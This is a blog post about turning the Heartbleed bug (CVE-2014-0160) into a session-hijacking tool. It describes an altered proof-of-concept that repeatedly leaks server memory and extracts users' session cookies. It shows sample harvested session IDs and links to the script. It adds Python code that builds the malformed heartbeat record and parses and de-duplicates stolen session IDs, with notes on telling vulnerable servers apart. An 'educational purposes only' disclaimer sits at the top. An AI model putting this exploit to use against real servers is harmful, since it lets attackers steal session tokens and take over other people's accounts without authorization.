Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no responsibility for you doing something stupid with it.

If you have been living under a rock recently, Heartbleed is a bug in OpenSSL's TLS heartbeat extension that allows anyone who can open a connection to a vulnerable server to read up to 64 KB of that server's process memory per heartbeat request, with no authentication and nothing in the server's logs to show it happened.

Matthew Sullivan posted a blog post earlier today about using CVE-2014-0160 to hijack user sessions from vulnerable servers. I altered the proof-of-concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session IDs.

Some very simple checks are in place so that each session ID is only printed once. You can check out Sullivan's blog post to see how these session IDs can be inserted into a web browser to steal those users' sessions.

Example output:

➜ ~ ./heartbleed-altered.py your_server.com session

session=1395650268
session=1552654927
session=9074328142
session=1584630615
session=1399867484
session=1570915943
session=6442471150
session=1134475661
session=1828846521
session=1025417958
session=1429746458
session=9503698952
session=3413620908
session=5569288762
session=3669059145
session=1624974555
session=1070329834
session=1747925477
session=1129670396
session=1017137517
session=2331559646

Altered Script is available at https://gist.github.com/mpdavis/10171593
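To make the two pieces concrete, here is an added example (written for this page; it is not the altered script linked above nor Stafford's PoC) showing the malformed heartbeat record the PoC sends and the chunk-parsing and de-duplication step described above. The memory chunks are constructed inline to stand in for heartbeat response payloads, the cookie name `session` matches the usage shown, and the character set allowed in a session value is an assumption you would adjust for the target application.

```python
import re
import struct

# Constructed sample "memory chunks" standing in for what a vulnerable server
# returns in a heartbeat response: fragments of other clients' HTTP requests
# interleaved with junk bytes. These are made up for this example.
SAMPLE_CHUNKS = [
    b"\x00\x00\x16GET /account HTTP/1.1\r\nHost: your_server.com\r\n"
    b"Cookie: session=1395650268; theme=dark\r\n\x00\xff\xfe"
    b"POST /cart HTTP/1.1\r\nCookie: session=1552654927\r\n\x00",
    b"\x7f\x00Cookie: session=1395650268\r\n\x00\x00"
    b"Set-Cookie: session=9074328142; Path=/; HttpOnly\r\n",
]


def build_heartbeat_request(claimed_len=0x4000, tls_version=(3, 2)):
    """Return the malformed TLS heartbeat record used by the Heartbleed PoC.

    Record layout: content type 0x18 (heartbeat), 2-byte protocol version,
    2-byte record length, then the heartbeat body: type 1 (request) and a
    2-byte payload_length. No payload bytes follow, so an unpatched OpenSSL
    trusts payload_length and echoes claimed_len bytes of its own heap.
    """
    major, minor = tls_version
    body = struct.pack("!BH", 1, claimed_len)
    return struct.pack("!BBBH", 0x18, major, minor, len(body)) + body


def extract_session_ids(chunk, cookie_name, seen):
    """Pull `cookie_name=<value>` pairs out of a raw memory chunk.

    `seen` is a set shared across calls so an ID is reported only the first
    time it appears, mirroring the de-duplication the altered script does.
    The allowed value charset is an assumption; adjust it for the target app.
    """
    pattern = re.compile(re.escape(cookie_name).encode() + rb"=([A-Za-z0-9%._-]+)")
    new_ids = []
    for match in pattern.finditer(chunk):
        sid = match.group(1).decode("ascii")
        if sid not in seen:
            seen.add(sid)
            new_ids.append(sid)
    return new_ids


def scan_chunks(chunks, cookie_name="session"):
    """Run the extraction over a sequence of chunks, returning unique IDs in
    the order first seen. In the real script each chunk would be the payload
    of one heartbeat response; here the chunks are the constructed samples."""
    seen = set()
    found = []
    for chunk in chunks:
        found.extend(extract_session_ids(chunk, cookie_name, seen))
    return found


if __name__ == "__main__":
    print(build_heartbeat_request().hex())  # 1803020003014000
    for sid in scan_chunks(SAMPLE_CHUNKS, "session"):
        print(f"session={sid}")
```

In the live script the chunks come back over a TLS socket after a ClientHello, and a patched server answers the heartbeat with an alert record (type 0x15) or nothing at all instead of a heartbeat record, which is how the original PoC tells vulnerable from not vulnerable. One caveat a regex scanner like this does not handle: a cookie that straddles the end of a 16 KB chunk is cut off, so a truncated value can be reported as if it were complete.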